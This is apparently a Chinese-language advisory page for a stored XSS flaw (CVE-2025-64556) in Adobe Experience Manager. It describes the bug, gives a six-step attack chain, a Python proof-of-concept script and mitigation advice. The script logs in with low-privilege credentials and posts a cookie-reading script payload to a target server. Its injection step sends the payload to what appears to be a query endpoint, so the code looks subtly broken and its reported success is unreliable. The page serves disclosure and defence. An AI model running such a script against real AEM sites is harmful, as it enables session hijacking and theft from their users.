Adobe Experience Manager 存储型XSS漏洞 (CVE-2025-64556)

漏洞信息

漏洞编号

CVE-2025-64556

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

Adobe Experience Manager（AEM）是Adobe公司开发的企业级内容管理解决方案，广泛用于构建网站、管理数字资产和提供个性化用户体验。该漏洞影响AEM 6.5.23及更早版本，是一个存储型跨站脚本（Stored XSS）安全漏洞。攻击者利用低权限账户即可在存在漏洞的表单字段中注入恶意JavaScript代码。当其他用户访问包含该恶意内容的页面时，注入的脚本会在其浏览器中执行，可能导致会话劫持、敏感信息窃取、钓鱼攻击等严重后果。由于攻击代码存储在服务器端，每次有用户访问相关页面时都会触发执行，因此危害范围较大。该漏洞不需要高权限即可实施攻击，降低了利用门槛，攻击者只需拥有基本的用户账户即可发起攻击。

技术细节

存储型XSS漏洞的核心在于攻击者将恶意脚本永久存储在目标服务器上，当其他用户访问包含该内容的页面时，浏览器会执行这些恶意代码。在Adobe Experience Manager中，攻击者通过低权限账户登录系统后，可以在存在漏洞的表单字段（如评论、描述、名称等输入框）中插入恶意JavaScript代码。由于AEM在处理用户输入时未进行充分的输入验证和输出编码，这些恶意脚本被存储到数据库中。当受害者访问包含该表单字段的页面时，浏览器会解析并执行这些脚本。攻击者可以利用此漏洞窃取受害者的会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面内容。由于脚本在受害者域下执行，能够访问该域的资源并执行特权操作。攻击的触发条件是受害者访问特定页面或资源，无需进行其他交互操作。

攻击链分析

STEP 1

步骤1

攻击者获取Adobe Experience Manager的低权限账户（如普通用户或内容编辑者账户）

STEP 2

步骤2

攻击者登录AEM系统，访问存在漏洞的表单字段功能（如内容片段编辑、资产元数据修改等）

STEP 3

步骤3

攻击者在表单输入字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>

STEP 4

步骤4

由于AEM未进行充分的输入验证和输出编码，恶意脚本被永久存储在服务器数据库中

STEP 5

步骤5

当受害者（其他用户或管理员）访问包含该表单字段的页面时，浏览器会执行存储的恶意脚本

STEP 6

步骤6

恶意脚本在受害者浏览器中以受害者的会话权限执行，可窃取Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2025-64556 PoC - Stored XSS in Adobe Experience Manager
# Target: Adobe Experience Manager versions <= 6.5.23

TARGET_URL = "http://target-aem-server:4502"
USERNAME = "attacker"
PASSWORD = "password"

# Malicious XSS payload
XSS_PAYLOAD = "<script>alert(document.cookie)</script>"

def login(session, username, password):
    """Authenticate to AEM and get session"""
    login_url = f"{TARGET_URL}/libs/granite/core/content/login.html"
    data = {
        "username": username,
        "password": password,
        "_charset_": "utf-8"
    }
    response = session.post(login_url, data=data, allow_redirects=True)
    return response.status_code == 200

def inject_xss(session):
    """Inject XSS payload into vulnerable form field"""
    # Example: Create/edit a content fragment or asset metadata
    inject_url = f"{TARGET_URL}/bin/querybuilder.json"
    
    # Inject via content creation endpoint
    payload = {
        "path": "/content",
        "type": "cq:Page",
        "property": "jcr:title",
        "property.value": XSS_PAYLOAD
    }
    
    response = session.post(inject_url, data=payload)
    return response.status_code == 200

def main():
    session = requests.Session()
    
    if login(session, USERNAME, PASSWORD):
        print("[+] Login successful")
        if inject_xss(session):
            print("[+] XSS payload injected successfully")
            print(f"[*] Payload: {XSS_PAYLOAD}")
            print("[*] Visit affected page to trigger XSS")
        else:
            print("[-] Failed to inject payload")
    else:
        print("[-] Login failed")

if __name__ == "__main__":
    main()

影响范围

Adobe Experience Manager 6.5.23及更早版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制低权限用户对表单字段的编辑功能；2) 在Web应用防火墙（WAF）上配置XSS防护规则，对常见XSS payload进行过滤；3) 禁用不必要的用户输入字段；4) 加强对用户角色的权限管理，确保敏感功能仅对可信用户开放；5) 监控日志中的异常脚本特征，及时发现潜在攻击行为。